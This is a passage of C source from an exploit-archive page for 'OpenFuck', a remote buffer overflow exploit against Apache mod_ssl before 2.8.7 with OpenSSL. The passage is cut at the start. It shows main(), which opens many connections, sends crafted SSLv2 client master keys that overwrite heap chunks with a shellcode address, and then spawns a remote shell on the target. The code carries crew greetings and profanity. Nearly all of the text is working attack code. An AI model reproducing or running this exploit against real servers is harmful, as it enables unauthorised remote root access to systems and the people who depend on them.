ssl connection\n"); printf(" -c open N connections. (use range 40-50 if u dont know)\n"); printf(" \n\n"); printf(" Supported OffSet:\n"); for (i=0; i<=MAX_ARCH; i++) { printf("\t0x%02x - %s\n", i, architectures[i].desc); } printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n"); exit(1); } int main(int argc, char* argv[]) { char* host; int port = 443; int i; int arch; int N = 0; ssl_conn* ssl1; ssl_conn* ssl2; printf("\n"); printf("*******************************************************************\n"); printf("* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *\n"); printf("*******************************************************************\n"); printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n"); printf("* #hackarena irc.brasnet.org *\n"); printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n"); printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n"); printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n"); printf("*******************************************************************\n"); printf("\n"); if ((argc < 3) || (argc > 6)) usage(argv[0]); sscanf(argv[1], "0x%x", &arch); if ((arch < 0) || (arch > MAX_ARCH)) usage(argv[0]); host = argv[2]; if (argc == 4) port = atoi(argv[3]); else if (argc == 5) { if (strcmp(argv[3], "-c")) usage(argv[0]); N = atoi(argv[4]); } else if (argc == 6) { port = atoi(argv[3]); if (strcmp(argv[4], "-c")) usage(argv[0]); N = atoi(argv[5]); } srand(0x31337); for (i=0; i<N; i++) { printf("\rConnection... %d of %d", i+1, N); fflush(stdout); connect_host(host, port); usleep(100000); } if (N) printf("\n"); printf("Establishing SSL connection\n"); ssl1 = ssl_connect_host(host, port); ssl2 = ssl_connect_host(host, port); send_client_hello(ssl1); get_server_hello(ssl1); send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1); generate_session_keys(ssl1); get_server_verify(ssl1); send_client_finished(ssl1); get_server_finished(ssl1); printf("Ready to send shellcode\n"); port = get_local_port(ssl2->sock); overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff); overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); *(int*)&overwrite_next_chunk[156] = cipher; *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12; *(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */ send_client_hello(ssl2); get_server_hello(ssl2); send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1); generate_session_keys(ssl2); get_server_verify(ssl2); for (i = 0; i < ssl2->conn_id_length; i++) { ssl2->conn_id[i] = (unsigned char) (rand() >> 24); } send_client_finished(ssl2); get_server_error(ssl2); printf("Spawning shell...\n"); sleep(1); sh(ssl2->sock); close(ssl2->sock); close(ssl1->sock); return 0; } /* spabam: It isn't 0day */

Apache mod_ssl < 2.8.7 openssl openfuckv2.c remote buffer overflow (2) Vulnerability / Exploit Source : Apache mod_ssl < 2.8.7 openssl openfuckv2.c remote buffer overflow (2)

Last Vulnerability or Exploits


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